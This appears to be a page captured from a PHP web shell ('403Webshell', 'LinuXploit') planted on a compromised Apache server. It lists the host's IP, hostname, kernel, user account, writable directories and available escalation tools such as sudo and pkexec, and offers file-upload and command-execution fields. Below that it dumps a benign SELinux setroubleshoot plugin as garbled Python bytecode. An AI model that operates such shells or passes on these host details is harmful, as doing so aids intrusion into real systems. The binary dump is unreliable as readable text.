- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.147.68.226
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/setroubleshoot/plugins/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/setroubleshoot/plugins/__pycache__/selinuxpolicy.cpython-36.opt-1.pyc
3

nm�a_�@sDddlZejddd�ZejZddlTddlmZGdd�de�ZdS)	�Nzsetroubleshoot-pluginsT)Zfallback)�*)�Pluginc@sLeZdZed�Zed�ZdZdZed�Zed�Z	ed�Z
dd�Zd	d
�ZdS)�pluginz3
    Your system may be seriously compromised!
    a�
    SELinux has prevented $SOURCE from modifying $TARGET.  This denial
    indicates $SOURCE was trying to modify the selinux policy configuration.
    All applications that need this access should have already had policy
    written for them.  If a compromised application tries to modify the SELinux
    policy this AVC will be generated. This is a serious issue. Your system
    may very well be compromised.
    z:Contact your security administrator and report this issue.�zUIf you do not think $SOURCE_BASE_PATH should try $ACCESS access on $TARGET_BASE_PATH.z]you may be under attack by a hacker, since confined applications should not need this access.cCstj|t�d|_dS)NZred)r�__init__�__name__�level)�self�r
�2/usr/share/setroubleshoot/plugins/selinuxpolicy.pyr0szplugin.__init__cCsJ|jdg�s|j�rF|jdddddddd	d
ddd
ddddg�rF|j�SdS)N�writeZselinux_config_tZdefault_context_tZfile_context_tZsemanage_store_tZsemanage_read_lock_tZsemanage_trans_lock_tZload_policy_exec_tZsetfiles_exec_tZcheckpolicy_exec_tZnewrole_exec_tZpolicy_src_tZrestorecond_exec_tZrun_init_exec_tZsetsebool_exec_tZsemanage_exec_tZselinux_var_lib_t)Zhas_any_access_inZopen_with_writeZmatches_target_typesZreport)r	Zavcr
r
r�analyze4s&zplugin.analyzeN)
r�
__module__�__qualname__�_ZsummaryZproblem_descriptionZfix_descriptionZfix_cmdZif_textZ	then_textZdo_textrr
r
r
r
rrsr)�gettextZtranslationrZsetroubleshoot.utilZsetroubleshoot.Pluginrrr
r
r
r�<module>s


Youez - 2016 - github.com/yon3zu
LinuXploit